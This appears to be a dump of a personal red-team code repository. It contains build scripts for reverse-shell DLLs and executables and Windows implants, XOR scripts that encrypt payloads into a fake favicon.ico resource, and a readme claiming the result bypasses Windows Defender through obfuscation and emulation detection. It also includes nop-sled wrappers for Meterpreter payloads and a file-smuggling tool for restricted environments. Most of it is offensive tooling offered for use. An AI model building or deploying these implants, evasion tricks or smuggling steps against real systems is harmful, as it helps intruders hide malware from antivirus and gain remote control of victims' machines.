--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /W1 /D_USRDLL /D_CRT_SECURE_NO_WARNINGS /D_WINDLL *.cpp /MT /link /DLL /OUT:reverse.dll
4 | echo Cleaning up...
5 | del *.obj *.lib *.exp
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/reverse.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/reverse.dll
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/reverseDLL.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/reverseDLL.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseEXE.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseEXE.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseEXE.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseEXE.txt
--------------------------------------------------------------------------------
/Cpp/message_box/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/message_box/message_box.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main(){
5 |
6 | MessageBox(NULL,"My first API call", "Hello World!", 0);
7 | return 0;
8 | }
--------------------------------------------------------------------------------
/Cpp/message_box/message_box.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/message_box/message_box.exe
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/ROTD.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD.exe
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/ROTD.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD.pdb
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/ROTD_orig.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD_orig.exe
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | rc resources.rc
4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res
5 | cl.exe /nologo /Od /favor:AMD64 /MT /W0 /GS- /DNDEBUG /D_CRT_SECURE_NO_WARNINGS /Tcrotd.cpp /link /OUT:ROTD.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/favicon.ico
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/resources.h:
--------------------------------------------------------------------------------
1 | #define FAVICON_ICO 100
2 |
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/resources.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/resources.o
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 |
3 | FAVICON_ICO RCDATA favicon.ico
4 |
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/resources.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/resources.res
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/reverse_shell.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/reverse_shell.bin
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/rotd.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/rotd.obj
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/ROTD/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
8 | KEY = "abcdefghijklmnopqrstuvwxyz"
9 |
10 | def xor(data, key):
11 |
12 | key = str(key)
13 | l = len(key)
14 | output_str = ""
15 |
16 | for i in range(len(data)):
17 | current = data[i]
18 | current_key = key[i % len(key)]
19 | output_str += chr(ord(current) ^ ord(current_key))
20 |
21 | return output_str
22 |
23 | def printCiphertext(ciphertext):
24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
25 |
26 |
27 |
28 | try:
29 | plaintext = open(sys.argv[1], "rb").read()
30 | except:
31 | print("File argument needed! %s " % sys.argv[0])
32 | sys.exit()
33 |
34 |
35 | ciphertext = xor(plaintext, KEY)
36 | open("favicon.ico",'wb').write(ciphertext)
37 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
38 |
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/reverse_shell/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS- /MP /DNDEBUG /Tcreverse_shell.cpp /link /OUT:reverse_shell.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.exe
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.obj
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/Readme.md:
--------------------------------------------------------------------------------
1 | My custom implementation of Sektor7's RED TEAM Operator: Malware Development Essentials Course
2 |
3 | This code hides the payload in the resource section of my PE file, and uses some simple obfuscation and emulation detection to
4 | bypass the most up to date Windows Defender definitions.
5 |
6 | More on bypassing Windows Defender Emulations here:
7 |
8 | https://github.com/0xAlexei/Publications/blob/master/Reverse%20Engineering%20Windows%20Defender/Windows%20Binary%20Emulator/BHUSA%20-%20DEFCON%20-%20Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Revision-3.pdf
9 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | rc resources.rc
4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res
5 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/favicon.ico
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/implant.exe
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/implant.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/implant.obj
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/msgbox64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/msgbox64.bin
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/resources.h:
--------------------------------------------------------------------------------
1 | #define FAVICON_ICO 100
2 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/resources.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/resources.o
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 |
3 | FAVICON_ICO RCDATA favicon.ico
4 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/resources.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/resources.res
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
8 | KEY = "mysecretkeee"
9 |
10 | def xor(data, key):
11 |
12 | key = str(key)
13 | l = len(key)
14 | output_str = ""
15 |
16 | for i in range(len(data)):
17 | current = data[i]
18 | current_key = key[i % len(key)]
19 | output_str += chr(ord(current) ^ ord(current_key))
20 |
21 | return output_str
22 |
23 | def printCiphertext(ciphertext):
24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
25 |
26 |
27 |
28 | try:
29 | plaintext = open(sys.argv[1], "rb").read()
30 | except:
31 | print("File argument needed! %s " % sys.argv[0])
32 | sys.exit()
33 |
34 |
35 | ciphertext = xor(plaintext, KEY)
36 | open("favicon.ico",'wb').write(ciphertext)
37 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
38 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | rc resources.rc
4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res
5 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/favicon.ico
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant.exe
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/implant.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant.obj
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/implant_noemul.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant_noemul.exe
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/resources.h:
--------------------------------------------------------------------------------
1 | #define FAVICON_ICO 100
2 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/resources.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/resources.o
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 |
3 | FAVICON_ICO RCDATA favicon.ico
4 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/resources.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/resources.res
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/reverse_shell/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS- /MP /DNDEBUG /Tcreverse_shell.cpp /link /OUT:reverse_shell.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.exe
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.obj
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/reverse_shell/shell.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/shell.bin
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/shell.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/shell.bin
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
8 | KEY = "mysecretkeee"
9 |
10 | def xor(data, key):
11 |
12 | key = str(key)
13 | l = len(key)
14 | output_str = ""
15 |
16 | for i in range(len(data)):
17 | current = data[i]
18 | current_key = key[i % len(key)]
19 | output_str += chr(ord(current) ^ ord(current_key))
20 |
21 | return output_str
22 |
23 | def printCiphertext(ciphertext):
24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
25 |
26 |
27 |
28 | try:
29 | plaintext = open(sys.argv[1], "rb").read()
30 | except:
31 | print("File argument needed! %s " % sys.argv[0])
32 | sys.exit()
33 |
34 |
35 | ciphertext = xor(plaintext, KEY)
36 | open("favicon.ico",'wb').write(ciphertext)
37 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
38 |
--------------------------------------------------------------------------------
/Powershell/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Presentations/.placeholder:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Presentations/Building Skynet_as_submitted.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Presentations/Building Skynet_as_submitted.pptx
--------------------------------------------------------------------------------
/Python/PushingP/pushingpayloads.py:
--------------------------------------------------------------------------------
1 | import sys
2 | # by 0xTriboulet
3 | # Short python script that takes a raw binary payload
4 | # and build a (big) nop sled over that payload
5 | # put this large payload into your program and compile with:
6 | # /STACK:3000000
7 | try:
8 | plaintext = open(sys.argv[1], "rb").read()
9 | except:
10 | print("File argument needed! %s " % sys.argv[0])
11 | print("python2 pushingpayloads.py meterpreter_stageless.bin > out.txt")
12 | sys.exit()
13 |
14 | print('unsigned char payload[] = { '+'0x90, '*2048000 + '0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')
--------------------------------------------------------------------------------
/Python/PushingP/pushingpayloadsv3.py:
--------------------------------------------------------------------------------
1 | import sys
2 | # by 0xTriboulet
3 | # Short python script that takes a raw binary payload
4 | # and build a (big) nop sled over that payload
5 | # put this large payload into your program and compile with:
6 | # /STACK:3000000
7 | # PYTHON3
8 | try:
9 | plaintext = open(sys.argv[1], "rb").read()
10 | except:
11 | print("File argument needed! %s " % sys.argv[0])
12 | print("python3 pushingpayloadsv3.py meterpreter_stageless.bin > out.txt")
13 | sys.exit()
14 |
15 | print('unsigned char payload[] = { '+'0x90, '*2048000 + '0x' + ', '.join(str(hex(x)) for x in plaintext) + ' };')
--------------------------------------------------------------------------------
/Python/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Python/smuggler/OUT/test.txt:
--------------------------------------------------------------------------------
1 | TEST
2 |
--------------------------------------------------------------------------------
/Python/smuggler/Readme.md:
--------------------------------------------------------------------------------
1 | Short python script that converts any file into a base64 encoded zip file stored in out.txt. You can then copy the script and the contents of out.txt into a a .py and an in.txt file (respectively) on the target environment and run the script again. This methodology allows you to transfer executables into environments that otherwise do not allow file transfers.
2 |
3 |
4 | [12/4/2022] Added -x option allowing the ability to xor your smuggled files
5 |
6 | 
7 |
8 |
9 | XORing remains optional though
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/Python/smuggler/in.txt:
--------------------------------------------------------------------------------
1 | UEsDBBQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAdGVzdC50eHRURVNUClBLAQIUAxQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAAAAAAAAAAAC0gQAAAAB0ZXN0LnR4dFBLBQYAAAAAAQABADYAAAArAAAAAAA=
--------------------------------------------------------------------------------
/Python/smuggler/out.txt:
--------------------------------------------------------------------------------
1 | UEsDBBQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAdGVzdC50eHRURVNUClBLAQIUAxQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAAAAAAAAAAAC0gQAAAAB0ZXN0LnR4dFBLBQYAAAAAAQABADYAAAArAAAAAAA=
--------------------------------------------------------------------------------
/Python/smuggler/test.txt:
--------------------------------------------------------------------------------
1 | TEST
2 |
--------------------------------------------------------------------------------
/Python/utilities/Readme.md:
--------------------------------------------------------------------------------
1 | A collection of useful python scripts. Some of these have been modified from their original versions, but credit is given as much as possible to the original authors.
2 |
3 |
--------------------------------------------------------------------------------
/Python/utilities/beautify.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | try:
4 | plaintext = open(sys.argv[1], "rb").read()
5 | except:
6 | print("File argument needed! %s " % sys.argv[0])
7 | sys.exit()
8 |
9 |
10 | open("payload.out",'wb').write(plaintext)
11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')
--------------------------------------------------------------------------------
/Python/utilities/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
8 | KEY = "WindowsSystem32"
9 |
10 | def xor(data, key):
11 |
12 | key = str(key)
13 | l = len(key)
14 | output_str = ""
15 |
16 | for i in range(len(data)):
17 | current = data[i]
18 | current_key = key[i % len(key)]
19 | output_str += chr(ord(current) ^ ord(current_key))
20 |
21 | return output_str
22 |
23 | def printCiphertext(ciphertext):
24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
25 |
26 |
27 |
28 | try:
29 | plaintext = open(sys.argv[1], "rb").read()
30 | except:
31 | print("File argument needed! %s " % sys.argv[0])
32 | sys.exit()
33 |
34 |
35 | ciphertext = xor(plaintext, KEY)
36 | #open("payload.out",'wb').write(ciphertext)
37 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
38 |
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
1 | A disorganized repository of code snippets that I have found useful in getting the hang of new languages in the context of Red Team operations.
2 |
3 | Some of this code will be referenced in other products and is retained here for ease of access.
4 |
--------------------------------------------------------------------------------
/Rust/CreateProcessA/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "peruns_fart"
3 | version = "0.1.0"
4 | edition = "2021"
5 |
6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
7 |
8 | [dependencies]
9 | sys = "0.0.0"
10 | winapi = {version = "0.3.9", features=[
11 | "winnt",
12 | "memoryapi",
13 | "errhandlingapi",
14 | "processthreadsapi",
15 | "synchapi",
16 | "winbase",
17 | "handleapi",
18 | "libloaderapi",
19 | "minwinbase",
20 | "heapapi"
21 | ]}
22 | windows = { version = "*", features = [
23 | "Win32_System_Threading",
24 | "Win32_Foundation",
25 | "Win32_System_Memory",
26 | "Win32_Security"
27 | ] }
28 | windows-sys = { version = "*", features = [
29 | "Win32_System_Threading",
30 | "Win32_Foundation",
31 | "Win32_System_Memory"
32 | ] }
33 |
34 |
35 |
--------------------------------------------------------------------------------
/Rust/CreateProcessA/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/peruns_fart/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "peruns_fart"
3 | version = "0.1.0"
4 | edition = "2021"
5 |
6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
7 |
8 | [dependencies]
9 | libc = "0.2.139"
10 | sys = "0.0.0"
11 |
12 |
13 | windows-sys = { version = "*", features = [
14 | "Win32_Security",
15 | "Win32_Foundation",
16 | "Win32_System_Kernel",
17 | "Win32_System_Memory",
18 | "Win32_System_Threading",
19 | "Win32_System_LibraryLoader",
20 | "Win32_System_SystemServices",
21 | "Win32_System_SystemInformation",
22 | "Win32_System_Diagnostics_Debug",
23 | "Win32_System_WindowsProgramming",
24 |
25 |
26 | ] }
27 |
28 |
29 |
--------------------------------------------------------------------------------
/Rust/peruns_fart/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/rust_implantv1/implant_rust.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv1/implant_rust.exe
--------------------------------------------------------------------------------
/Rust/rust_implantv2/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "rusty_implant"
3 | version = "0.1.0"
4 | edition = "2021"
5 |
6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
7 |
8 | [dependencies]
9 | libc = "0.2.139"
10 | region = "3.0.0"
11 |
--------------------------------------------------------------------------------
/Rust/rust_implantv2/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/rust_implantv2/rusty_implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv2/rusty_implant.exe
--------------------------------------------------------------------------------
/Rust/rust_implantv3/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "rusty_implantv2"
3 | version = "0.1.0"
4 | edition = "2021"
5 |
6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
7 |
8 | [dependencies]
9 | libc = "0.2.139"
10 | sys = "0.0.0"
11 |
12 |
13 | windows-sys = { version = "*", features = [
14 | "Win32_Security",
15 | "Win32_Foundation",
16 | "Win32_System_Kernel",
17 | "Win32_System_Memory",
18 | "Win32_System_Threading",
19 | "Win32_System_LibraryLoader",
20 | "Win32_System_SystemServices",
21 | "Win32_System_SystemInformation",
22 | "Win32_System_Diagnostics_Debug",
23 | "Win32_System_WindowsProgramming",
24 |
25 |
26 | ] }
27 |
--------------------------------------------------------------------------------
/Rust/rust_implantv3/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/rust_implantv3/rusty_implantv3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv3/rusty_implantv3.exe
--------------------------------------------------------------------------------
/Rust/rust_implantv4/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "rusty_implantv2"
3 | version = "0.1.0"
4 | edition = "2021"
5 |
6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
7 |
8 | [dependencies]
9 | libc = "0.2.139"
10 | sys = "0.0.0"
11 |
12 |
13 | windows-sys = { version = "*", features = [
14 | "Win32_Security",
15 | "Win32_Foundation",
16 | "Win32_System_Kernel",
17 | "Win32_System_Memory",
18 | "Win32_System_Threading",
19 | "Win32_System_LibraryLoader",
20 | "Win32_System_SystemServices",
21 | "Win32_System_SystemInformation",
22 | "Win32_System_Diagnostics_Debug",
23 | "Win32_System_WindowsProgramming",
24 |
25 |
26 | ] }
27 |
--------------------------------------------------------------------------------
/Rust/rust_implantv4/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/rust_implantv4/rusty_implantv4.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv4/rusty_implantv4.exe
--------------------------------------------------------------------------------
/Rust/rusty_calc/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "rusty_calc"
3 | version = "0.1.0"
4 | edition = "2021"
5 |
6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
7 |
8 | [profile.release]
9 | opt-level = 0
10 |
11 |
12 |
13 | [dependencies]
14 | errno = "0.2.8"
15 | libc = "0.2.139"
16 | windows-sys = {version = "0.42.0", features=["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading",
17 | "Win32_Security", "Win32_System_Diagnostics_Debug","Win32_System_LibraryLoader"]}
18 |
--------------------------------------------------------------------------------
/Rust/rusty_calc/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------